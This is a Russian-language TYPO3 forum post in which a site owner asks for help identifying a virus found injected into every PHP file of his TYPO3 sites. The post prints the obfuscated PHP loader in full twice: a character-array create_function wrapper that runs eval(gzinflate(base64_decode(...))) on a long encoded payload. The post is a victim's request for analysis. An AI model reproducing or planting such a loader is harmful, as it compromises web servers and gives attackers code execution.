Russian TYPO3 community - Показать сообщение отдельно

semender · 25.10.2012, 15:40

недавно на всех typo3 сайтах на одном из моих серверов, во всех php файлах обнаружил добавленным такой код. Вот пытаюсь расшифровать, никак не выходит, помогите пожалуйста.

PHP код:


			
$md5 = "89bc86968a0ff8960b640edcf06de95e";
$a6 = array('t',"_","6",'4',"n",'z','g','c',")",'s','f',"l","i","a","v",'b','$','d',"e","o",';',"r",'(');
$b65 = create_function('$'.'v',$a6[18].$a6[14].$a6[13].$a6[11].$a6[22].$a6[6].$a6[5].$a6[12].$a6[4].$a6[10].$a6[11].$a6[13].$a6[0].$a6[18].$a6[22].$a6[15].$a6[13].$a6[9].$a6[18].$a6[2].$a6[3].$a6[1].$a6[17].$a6[18].$a6[7].$a6[19].$a6[17].$a6[18].$a6[22].$a6[16].$a6[14].$a6[8].$a6[8].$a6[8].$a6[20]);
$b65('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');

видно что создается функция

PHP код:


			
function  lambda($v)
{
return eval(gzinflate(base64_decode($v)));
};

Но при вызове в таком порядке текст всё равно не читаем.

25.10.2012, 15:40	#1
semender Senior Member Регистрация: 06.08.2010 Адрес: Makhachkala Сообщений: 142	Помогите что за вирус? недавно на всех typo3 сайтах на одном из моих серверов, во всех php файлах обнаружил добавленным такой код. Вот пытаюсь расшифровать, никак не выходит, помогите пожалуйста. PHP код: $md5 = "89bc86968a0ff8960b640edcf06de95e"; $a6 = array('t',"_","6",'4',"n",'z','g','c',")",'s','f',"l","i","a","v",'b','$','d',"e","o",';',"r",'('); $b65 = create_function('$'.'v',$a6[18].$a6[14].$a6[13].$a6[11].$a6[22].$a6[6].$a6[5].$a6[12].$a6[4].$a6[10].$a6[11].$a6[13].$a6[0].$a6[18].$a6[22].$a6[15].$a6[13].$a6[9].$a6[18].$a6[2].$a6[3].$a6[1].$a6[17].$a6[18].$a6[7].$a6[19].$a6[17].$a6[18].$a6[22].$a6[16].$a6[14].$a6[8].$a6[8].$a6[8].$a6[20]); $b65('DZZFssWIAQOPk5nywkyVlZmZvUmZmZ/x9PlnkFrq6srGf5qvm+sx+1X/5NlREdj/yqpYyuqf//BpKh6LmzGDF0MgJTOA10GeRRVmqbJYyGMFuQEE1Po4aVDHA4C0e1lwBuYcCAJRmnuVDmrUSmnHCoKdNUpxM9fgDPtD4FRGUTUD2wkoqEkCLM5Hc1vSnjds0o42PmaEc/GMurKJ59ZJcpgb1KlAg8o0UZM9QvFL4gGs9hYWwDQI8ip9RtuTGr/6SNGLh8H4sOO+az6eEjUHXUx9uKGUkO1QVXB2sE4DUlJCsOSCuyL5uHzoXTp4aT+1lZ+axGvekJ18FotlTmXeJwlQ1Vvg/rQy5EYERvJQ3m1SuLiaj2De4vrRrh3DB8l0A+vlDYhAvzYRfixv/lXljPXpDj/k4NAua/HobotcsBQoZZuuyZGgWnpVGpP4gTYURDi+SOa/I03I8i1MHf+Zatw9TeMk4bnwFuqDkvTlqIYCiLSMZDNuVENh+jTWFYOguo9oFZsp/G7npVV+l7JF3l+OOVchwcCkhzRv6Lwt79Q8Dw6q4suv+3rN63Tv2DRucGBcZyUXg3FEB4e7NX7ulKZQbV4G8Vj6jpEBeVfU8z0biI6Ti0nCyYcU2ddl1OwkDOd+CqpTZGkpEhIYhheU/Zpj6m0t79dpO1l+X56AfSmTr06/Wq50ardgXjCuQo+XSRfvR1xH9GncemDEHLShMux/68ZHhk0z+XvxQEKs5zkR9AGv5DGU/K0tkaMr2Qmo70RnXnydef/MklaamrF+omG208OAfnXHTOSvH5VzES8sZsQ5aNqxvVwl3Wm1NHXe/vxpeqojiSs9KojbmZFa1mZzZXBCjq6x/NDCQTZ1SjWS4qcmAbEn5+ZyK5BkpKzf1vd8jhhtrHa+pZKtc8pP5Xhev4e7XgUA7kSLw65Zfwjfyc0Cy0YvAmjVapixD1kynzH7frbEtLu3lJNo9T8TNS8ZHDyUu4QXN5/9wDnPBIiqJThDhhmKNlWCZ9XaAOC2QpAYSTss3jEpzqEjERcZs3sqXoAWZcK31YYtkj8YMzHx7XlvGlk/8UWGvBhaf6c2SfcBJ95LrljBaucBrQzK3Oo/3gS4bzT+zDlCDbwRg2tD/PJfU01gLgllM8S1ZaqssZJup3HnrUwQsOomBbCKcvZ016Evv9Vx7zkYNLjL/Eeeq5l7jLc3TJ0SUN7qZNGkNLYLTuzrzN9eziNzWqVbRPcppWj4NWuyA8EL/7FyFtX25Qzc+J0pa0WXZ9Q6AsnKaaJ1tV6VMc7Prl/N/MYvC2yAfBmQO4XY/GihkHPubneS9rObntCwNn2C8HGIHQ0OKW0s3iZvahfMZEzl2uMQrvHl74d2sjGU47acvaAw5tWUE3XnKGv2PWhi6dJDcRRTwF8qeCzYtE9JMhCYjuZUJLq+yYajuLjEB1AGieCzdsJUtTHg1c/pTdTXWiG6VUO4eNFt06rFebBTcVBQSI3/LNwdE3XWewNy0MwBWluUR5HmTNHP39sKP86rxWa6GHO29wW7A3/VJ+/aB93V5A/HKRlqr7sHNv6dFEz22USKqzXkttzYCT9aNhu2nHFz2qbZAnk1d4LgQevxmmqN3TGkqUUGgEYFluvtML3v8xNL3U7ChGLEiWUzhOEAdF6v0GXyBveEvkHHQdcEk8TzQfrnRyj/MNgOt0QouHRXOXeROcslhJh4DdADD5suFu5+DVqe+gWR4By8wo/4mxYvDGjISXQcwGiIjQSi97UfMybrV2p+IH877bT0nJbT7PJ+OmH9vXJw18dU4ORlOIJxRo7RGNbTOd5n7FoZtFEkfCHvc19oy2k25xtsHyWAnT1SlZr0REu9UrGj97cuDlpDNHqCWuaQtw+9k03A9gjQfChGIHX0+Tq72V/zLjIu6uU3hK/UtWfqVEMqHAygUNf++HRO6ADU/L79+uTH6h8D6BtlseCkXt94CXrhJtPQY1rPUMxRzM60zNxX/TVDG6mjFzRH7FPAq//cbKBo3fH56JzRQWQxWOH8GXgLTym6jeMSQPYYvYtA/teUZRzWfcz3VfFSaju4woyQQHpDVAa0IuHYswpfRFG3YUrwKEZmc1df3T0j4SJn3uyBv5KPVcJdbuPO76zbVxnNNa7w69LZLYAfkt4LfmLXCpgH4kwLfM3yJUhKjhSR7akMyEJEB4mYZeFa1cXiTw6w0gOT3P1YKuUQtlIHEFObVbLIJEXh7eHqU68npQx0PDG81/oj86ztrTGV9gcYP/i0Q7IaZj8ZrQ4pa1IYGYu6GzgaACbOXpIrgLh0L/yt2I7876a40OaX10glXsmeWbPzrlz6Rj2YBa7y/MTpbTEC4WVVwrvtPls7B9+AT6yOAwUD4MD73Kl2iAmOwaSsLGKMdXcvpLGG5J7cxgmtLD5OrQ7Ny+qVCwi4ZAOB7LuGOveFQHOOZsyCXYHcFhH5/GWQUEJEOUooSvliAbTJUtIoFXb1Q91t2Xxju6gje0Xc3g7lXoyNUuYJg1QPw874Pbt2TmAwDcjFVtk4hc9CAszUjapW/qxL2m1uA+TR7yxiOYu/sDu+Udl4E+bp+aElOUMCbVSph3CSTZ2gIAt3Thzrc2OVqP4BOyCpUZ/2v+mgRo0D2Pramb2VNIf9U5/2ytmrKbIlqIZWxpeq5JEsDtRjbLQ/giQKx/ALpR2MEVrw19zTXEZ8UcZMV9oqjd/wSjjt20d4grgK5w7jYdqWqWSz2TD5n5eMOSWHDd5TtH/nRH+6aUPyz49OixlWGBIPEQwYKDx3QQYFMKn82T/N32/4GiMYkH9kvRCO9ScTCIwhj2/+3ICE/mxU2Q6uzmlN2/USFqD0rKBfpwwy5GPjC1gFHvUINvFWE19YVR9NW9lt/tEpQsDj/HOiKInjE4PJZD/zTKU+dNGTpEfsYJBYBz1t1fi54Q+lmulEnCM+0ItAD7LzjzlWDCJM0jYGS3eXiu9JSEKxIayis3CWM/wD+e3bY5E4r02mtPrlBNaZ5/SR0r39fLJaVCWbgFiRzdX7xRK/H4HRgsO201mZEs6e2DechqHPGwHPm2BV1zUI0iRIsf/5999///t/'); видно что создается функция PHP код: `function lambda($v) { return eval(gzinflate(base64_decode($v))); };` Но при вызове в таком порядке текст всё равно не читаем. __________________ Я чертовски люблю слушать ложь, смотря в глаза... особенно когда знаю правду... И никогда не вру людям,которых называю друзьями...